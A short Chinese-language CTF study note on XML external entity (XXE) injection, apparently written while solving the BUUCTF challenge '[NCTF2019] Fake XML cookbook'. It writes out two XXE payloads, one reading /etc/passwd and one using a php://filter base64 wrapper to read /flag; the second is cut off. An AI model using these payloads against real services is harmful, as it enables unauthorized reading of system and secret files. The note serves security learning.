目录:
一、基础知识:
二、注入方法:
借用的环境是这个buu的题:buu的[NCTF2019]Fake XML cookbook
,
1. 直接通过DTD外部实体声明
内部实体声明,应该是无法触发xxe漏洞的,所以我们用的应该都是 外部实体声明。也就是 SYSTEM 后面的东西都是外部的url的东西?。。不是呀,这个应该就不影响了,只是 system 后面的东西 不一样而已,
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY adam SYSTEM "file:///etc/passwd">
]>
有时候,可能flag是在PHP文件中,直接是看不到了,可以用PHP伪协议来读取。
<?xml version="1.0"?>
<!DOCTYPE test[
<!ENTITY aa SYSTEM "php://filter/read=convert.base64-encode/resource=/flag"